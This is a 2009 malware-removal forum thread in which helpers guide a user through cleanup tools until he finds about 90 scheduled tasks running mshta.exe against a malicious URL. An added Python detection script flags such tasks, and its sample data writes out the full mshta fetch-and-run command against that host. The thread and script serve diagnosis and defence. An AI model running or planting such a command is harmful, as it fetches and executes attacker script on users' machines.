MSHTA keeps running

Discussion in 'Malware Help (A Specialist Will Reply)' started by cojo_cojo, Feb 7, 2009.

  1. cojo_cojo

    cojo_cojo Private E-2

    AVG keeps telling me about a threat detection as follows:

    wrksqumczgeilnapirro.cn/s_t_t.php Exploit JavaScript Obfuscation

    It does nothing about it, it just tells me, over and over again.

    In addition to this I end up with dozens of MSHTA processes running on the system and the only way to get rid of them is to end them via the End Process function.

    I've searched everywhere on Google and can find nothing similar. I have searched the PC for any existence of this strange PHP file and nothing there either.

    Can anyone help tell me what this is - I have attached a HijackThis log if it helps. Many thanks
     
  2. cojo_cojo

    cojo_cojo Private E-2

    sorry - forgot the HijackThis log - thanks

     
    Last edited by a moderator: Feb 10, 2009
  3. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    Welcome to MajorGeeks.com!

    Please follow the instructions in the READ & RUN ME FIRST link given further down and attach the requested logs when you finish these instructions.
    • If you have problems where no tools seem to run, please try following the steps given in the below and then continue on no matter what you find. You only need to try the TDSSserv steps if having problems getting scans in the Read & Run Me First.
    • If something does not run, write down the info to explain to us later but keep on going.
    • Do not assume that because one step does not work that they all will not.
    READ & RUN ME FIRST. Malware Removal Guide


    Helpful Notes:

    1. If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in Safe Mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
    2. If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware, Malwarebytes and Spybot ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.
    3. To avoid additional delay in getting a response, it is advised that after completing the READ & RUN ME you also read this sticky:
    4. Any additional post is a bump which will add more delay. Once you attach the logs, your thread will be in the work queue and as stated our system works the oldest threads FIRST.
     
  4. cojo_cojo

    cojo_cojo Private E-2

    Hi Thank you for that comprehensive list - Which I think I've managed to run ok. I attach the last set of zip files for your perusal.

    I have also attached a word document which contains a screen shot of an incident prior to the capture of all this information which may help understand why MSHTA keeps running - I had a thing called Process Explorer running - which you will see in the background, and in the foreground is AVG's message warning of the threat.

    I saw a very brief but not very explanatory note on a search that AVG may have previously found a problem but not completed the job - the suggestion was that "It has deleted the 'file' but not the service that calls it". All gobbledygook to me, but thought it may help. Many thanks again for your time.
     

    Attached Files:

  5. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    I still need some more logs from the READ ME.

    • ComboFix Log
    • SUPERAntiSpyware Log
    • Malwarebytes Anti-Malware Log
     
  6. cojo_cojo

    cojo_cojo Private E-2

    ok sorry here they are
     

    Attached Files:

  7. cojo_cojo

    cojo_cojo Private E-2

    ...oh and also the MSHTA problem still exists, one interesting new item to add is that each occurrence of it now seems to be taking up more memory and a more consistent volume (around 13m) whereas before the amount of memory each instance occupied seemed to vary between 400k and 12m ?
    Thanks again for your help thus far.
    regards
     
  8. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    First, let's shorten up the logs. Click Start > Run > type notepad and press ENTER.

    Once Notepad comes up, type the below into Notepad.
    Once you're done, click on File > Save As > fix.bat and save to your desktop.

    Once you're done, locate the file on your desktop "fix.bat" and double click on it. A command prompt will flash, once it goes away run ComboFix again and attach a new log.

    Also, run the C:\MGtools\GetLogs.bat file by double clicking on it, attach the new set of logs to your next post.
     
  9. cojo_cojo

    cojo_cojo Private E-2

    Thanks again - here are the details.
     

    Attached Files:

  10. bjgarrick

    bjgarrick MajorGeeks Admin - Malware Expert

    Let's do one more quick fix to shorten the logs up...

    Now we need to use ComboFix to remove a bunch of malware files.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouse click ComboFix's window while it is running. That may cause it to stall.
    Finally...
    Run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator).

    Then attach the below logs:
    • C:\ComboFix.txt
    • C:\MGlogs.zip
    Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now.
     
  11. cojo_cojo

    cojo_cojo Private E-2

    Sorry about the delay in replying but I've been away on holiday. Here are the attached logs from your most recent instruction, many thanks for your help.
    I may be separated from my PC for a further 5 days so will return any further info to you then. Regards
     

    Attached Files:

  12. cojo_cojo

    cojo_cojo Private E-2

    Hi bjgarrick, have you had any more thoughts on this post? I've been grateful for your help thus far. Many thanks
     
  13. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Since you never put your PC into normal startup mode with MSconfig as requested in step 1 of the READ & RUN ME, you still have outstanding issues. You need to put your PC into normal startup mode and remain in that mode. After doing this you need to attach a new MGtools log so we can finish your cleaning instructions.

    In addition you had AVG running while trying to use ComboFix and it caused the fix not to work. While not specifically stated in BJ's instructions this info was stated in the original instructions for using ComboFix and always applies.
     
  14. cojo_cojo

    cojo_cojo Private E-2

    Ok thanks for this. I went back to Normal mode startup - and allowed all the various programs to start, including AVG. I tried my level best to disable AVG and stop its component parts running, but it is very insistent. In fact the only way to really stop it seems to be to 'untick' using msconfig, but that conflicted with what you wanted me to do in respect of starting up in Normal Mode.

    Anyhow, it's done now and I hope the results are a little more helpful - I attach them as requested.

    The problem still persists, if it's of any help there is almost a regularity about the warnings I get from AVG about this MSHTA thing, it's as if something somewhere is using MSHTA to kick something off at a regular interval.

    Anyway - hope you can help - I still cannot find anybody in the entire world on the internet who seems to have a similar problem to this.

    many thanks
     

    Attached Files:

  15. cojo_cojo

    cojo_cojo Private E-2

    ..and one other attachment as well so you can see what I'm seeing. Many thanks.
     

    Attached Files:

  16. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Actually there are many better ways. Step 1 of the READ & RUN ME gave you this link: Dealing with Startup Processes

    There are a couple right here in this forum. ;)

    I still strongly suggest that you uninstall MessengerPlus! 3 as stated in step 1 of the READ & RUN ME.

    You need to run Spybot and select the Immunize feature and allow it to Immunize your PC as requested in the READ & RUN ME. After you click Immunize it scans to see what needs to be Immunized. Then you need to click the green + sign at the top to actually Immunize.



    Now let's flush the Java Cache
    • Click Start > Settings > Control Panel
    • Double click the Java icon (be patient, it may take a while to open)
    • Now click the General tab and under the Temporary Internet File area
    • Click the Settings button and then click the Delete Files... button.
    • In the next popup click OK.
    If you have multiple Java plugin icons in Control Panel follow the above to clear all their caches.


    Now let's flush the Internet Explorer Cache



    To flush your Internet Explorer Cache:
    • click Tools
    • Internet Options
    • Now on the General tab, click Delete Files and select Delete all Offline content too
    • Click OK.
    • When it finishes Click OK.
    Run this Disable/Remove Windows Messenger to remove Windows Messenger. Do not confuse Windows Messenger with MSN Messenger because they are not the same. Windows Messenger is a frequent cause of popups.

    Uninstall the below software:
    Dealio Toolbar 3.4 <-- should have been uninstalled in step 1 of the READ ME
    Java(TM) 6 Update 10
    Search Settings 1.2 <-- should have been uninstalled in step 1 of the READ ME

    Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:


    O2 - BHO: DealioBHO Class - {6A87B991-A31F-4130-AE72-6D0C294BF082} - C:\Program Files\Dealio\kb127\Dealio.dll
    O3 - Toolbar: Dealio - {E67C74F4-A00A-4F2C-9FEC-FD9DC004A67F} - C:\Program Files\Dealio\kb127\Dealio.dll
    O4 - HKLM\..\Run: [UpdReg] ; C:\WINDOWS\UpdReg.EXE
    O4 - HKLM\..\Run: [SearchSettings] C:\Program Files\Search Settings\SearchSettings.exe
    O4 - HKLM\..\Run: [RealTray] ; C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
    O4 - HKLM\..\Run: [au] C:\Program Files\Dealio\DealioAU.exe
    O8 - Extra context menu item: Compare Prices with &Dealio - C:\Documents and Settings\Colin\Application Data\Dealio\kb127\res\DealioSearch.html
    O9 - Extra button: Dealio - {E908B145-C847-4e85-B315-07E2E70DECF8} - C:\Program Files\Dealio\kb127\Dealio.dll
    O9 - Extra 'Tools' menuitem: Dealio - {E908B145-C847-4e85-B315-07E2E70DECF8} - C:\Program Files\Dealio\kb127\Dealio.dll
    O16 - DPF: {70BA88C8-DAE8-4CE9-92BB-979C4A75F53B} - http://launch.gamespyarcade.com/software/launch/alaunch.cab

    I also suggest that you optionally fix the below non-malware but unnecessary startups.
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
    O4 - HKLM\..\Run: [HP Lamp] ; "C:\Program Files\Hewlett-Packard\HP PrecisionScan\PrecisionScan Pro\hplamp.exe"
    O4 - HKLM\..\Run: [DMXLauncher] ; C:\Program Files\Dell\Media Experience\DMXLauncher.exe
    O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
    O4 - HKLM\..\Run: [Adobe Photo Downloader] ; "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
    O4 - HKCU\..\Run: [DellTransferAgent] ; "C:\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe"
    O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
    O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe

    After clicking Fix, exit HJT.





    Now download The Avenger by Swandog46, and save it to your Desktop.
    • Extract avenger.exe from the Zip file and save it to your desktop
    • Run avenger.exe by double-clicking on it.
    • Do not change any check box options!!
    • Copy everything in the Quote box below, and paste it into the Input script here: part of the window:
    • Now click the Execute button.
    • Click Yes to the prompt to confirm you want to execute.
    • Click Yes to the Reboot now? question that will appear when Avenger finishes running.
    • Your PC should reboot, if not, reboot it yourself.
    • A log file from Avenger will be produced at C:\avenger.txt and it will popup for you to view when you login after reboot.
    After reboot look for all of the above files we had Avenger attempt to delete. If you still see them, delete them yourself.

    Also delete all files in the below folders except ones from the current date (Windows will not let you delete the files from the current day).
    C:\WINDOWS\TEMP
    C:\Documents and Settings\Sean Walsh\Local Settings\Temp


    Now run Ccleaner to remove temp files!

    Now goto this link Using MGtools and download the new version of MGtools.exe from the black bold print link in the first sentence. Overwrite your previous MGtools.exe file with this one.




    Then attach the below logs:
    • C:\avenger.txt
    • C:\MGlogs.zip
    Make sure you tell me how things are working now!
     
    Last edited: Mar 8, 2009
  17. cojo_cojo

    cojo_cojo Private E-2

    Thanks for this - I pretty much cleared out all the things you said, although many of them were not there (e.g. Windows Messenger). I attach the logs requested.

    AVG is still popping up with the warnings and MSHTA is still running dozens of versions in the process window....well after about an hour there are dozens running.

    Apologies but I forgot to run CCleaner till after MGTools, but I checked the directories you asked me to and they were virtually empty apart from a few files from today's date.

    Many thanks I hope this helps.
     

    Attached Files:

  18. cojo_cojo

    cojo_cojo Private E-2

    SOLVED

    I think I found it. I figured out that the AVG prompt kept coming up at regular rather than random intervals, and so it was, exactly 15 minute intervals. I figured that the Scheduled Task window was a good place to check so I went into this via Accessories, System Tools and lo and behold there were around 90 items called at1, at2, at3 etc etc and a right-click, properties revealed that each of them called MSHTA.exe with a parameter that was the enormously long and complicated php file name described in previous posts.

    I deleted them all and the problem has gone away, fantastic - what I do not know is how it got there in the first place, nor what it was trying to do.

    Thanks for all your help, perhaps this may help someone else who gets this problem, although I've yet to find anyone else who has.

    Many thanks
     
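The regular 15-minute alert interval cojo_cojo describes in posts 14 and 18 is the fingerprint of a scheduled job, and names like At1, At2, At3 are what Windows gives to jobs created through the AT service. As an added example, not code from this thread or from MajorGeeks, here is a small Python check that reads the CSV output of `schtasks /query /fo CSV /v` (a command that exists on Windows XP Professional and later) and flags every task whose executable is mshta.exe, rating a task that passes a remote URL as high severity and one that runs a local .hta file as worth a review, then grouping identical commands so that ninety look-alike jobs collapse into one line. The sample output is constructed and cut down to the columns the check reads; the At1/At2 rows mirror the thread's description and reuse the host name from the AVG alert, while the VendorUpdater/VendorHelp tasks and the paths under C:\Program Files\Vendor are placeholders.

```python
import csv
import io
import re
from collections import OrderedDict

# Constructed sample of `schtasks /query /fo CSV /v` output, cut down to the
# columns this check reads. At1/At2 are modelled on the thread's report
# (jobs firing every 15 minutes, each launching MSHTA.exe with the URL from
# the AVG alert). The remaining rows are made-up benign entries, and the
# second header line imitates the repeated header some schtasks versions emit.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Schedule","Task To Run","Run As User"\n'
    '"EXAMPLE-PC","At1","Every 15 minute(s)",'
    '"mshta.exe http://wrksqumczgeilnapirro.cn/s_t_t.php","SYSTEM"\n'
    '"EXAMPLE-PC","At2","Every 15 minute(s)",'
    '"C:\\WINDOWS\\system32\\mshta.exe http://wrksqumczgeilnapirro.cn/s_t_t.php","SYSTEM"\n'
    '"HostName","TaskName","Schedule","Task To Run","Run As User"\n'
    '"EXAMPLE-PC","VendorUpdater","Daily",'
    '"""C:\\Program Files\\Vendor\\update.exe"" /silent","SYSTEM"\n'
    '"EXAMPLE-PC","VendorHelp","At logon",'
    '"C:\\WINDOWS\\system32\\mshta.exe C:\\Program Files\\Vendor\\help.hta","EXAMPLE-PC\\user"\n'
)

# mshta will happily fetch and execute script from a URL, which is what makes
# a remote argument the high-severity case.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_schtasks_csv(text):
    """Return one dict per task row, skipping any repeated header rows."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        if row.get("TaskName") == "TaskName":
            continue
        rows.append(row)
    return rows


def split_command(task_to_run):
    """Split a 'Task To Run' value into (executable, arguments), honouring a quoted path."""
    cmd = task_to_run.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end != -1:
            return cmd[1:end], cmd[end + 1:].strip()
    parts = cmd.split(None, 1)
    return (parts[0] if parts else ""), (parts[1] if len(parts) > 1 else "")


def find_mshta_tasks(text):
    """Flag every task whose executable is mshta.exe, regardless of the path it is given with."""
    findings = []
    for row in parse_schtasks_csv(text):
        exe, args = split_command(row.get("Task To Run", ""))
        basename = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if basename != "mshta.exe":
            continue
        remote = URL_RE.search(args) is not None
        findings.append({
            "task": row["TaskName"],
            "schedule": row.get("Schedule", ""),
            "user": row.get("Run As User", ""),
            "args": args,
            # remote script fetched on every run: high; local .hta: look at it
            "severity": "high" if remote else "review",
        })
    return findings


def group_by_command(findings):
    """Group flagged tasks by their mshta argument, so one payload scheduled
    under many At-job names shows up as a single entry with all the names."""
    groups = OrderedDict()
    for finding in findings:
        groups.setdefault(finding["args"], []).append(finding["task"])
    return groups


if __name__ == "__main__":
    # On a live machine: schtasks /query /fo CSV /v > tasks.csv, then read that
    # file instead of the constructed sample.
    hits = find_mshta_tasks(SAMPLE_SCHTASKS_CSV)
    for args, names in group_by_command(hits).items():
        severity = next(h["severity"] for h in hits if h["args"] == args)
        print("[%s] mshta.exe %s" % (severity, args))
        print("    tasks: %s" % ", ".join(names))
```

A task that fires mshta.exe against a URL every 15 minutes explains both symptoms in the thread: AVG blocks the script each time it is fetched, while the mshta process left behind keeps accumulating. The same enumeration is also the cleanup check: after the jobs are deleted, rerunning it should return nothing.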
  19. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome.

    Good job!

    Yes! I inadvertently left those out of the Avenger fix. I had them in a ComboFix script I was working out but forgot to put them into the Avenger fix. You can see that these were detected and show in the runkeys.txt log which is in the MGlogs.zip file.

    Your logs are clean.


    If you are not having any other malware problems, it is time to do our final steps:
    1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.
    2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
      • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
      • "%userprofile%\Desktop\combofix" /u
        • Note: the space between combofix" and /u must be there.
        • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
      • Delete the C:\combofix folder from combofix (if it exists)
    3. If we had you run Avenger, you can delete all files related to Avenger now.
    4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
    5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
    6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
    7. Go to add/remove programs and uninstall HijackThis.
    8. You can delete the C:\MGtools folder and the C:\MGtools.exe file. You can also delete the C:\MGlogs.zip
    9. If you are running Vista, Windows XP or Windows ME, do the below:
      • Refer to the cleaning procedures in step 3 the READ ME for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
      • Then reboot and Enable System Restore to create a new clean Restore Point.
    10. After doing the above, you should work thru the below link:
     
  20. cojo_cojo

    cojo_cojo Private E-2

    Appreciate all your help - many thanks



     
  21. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome. Surf safely!
     
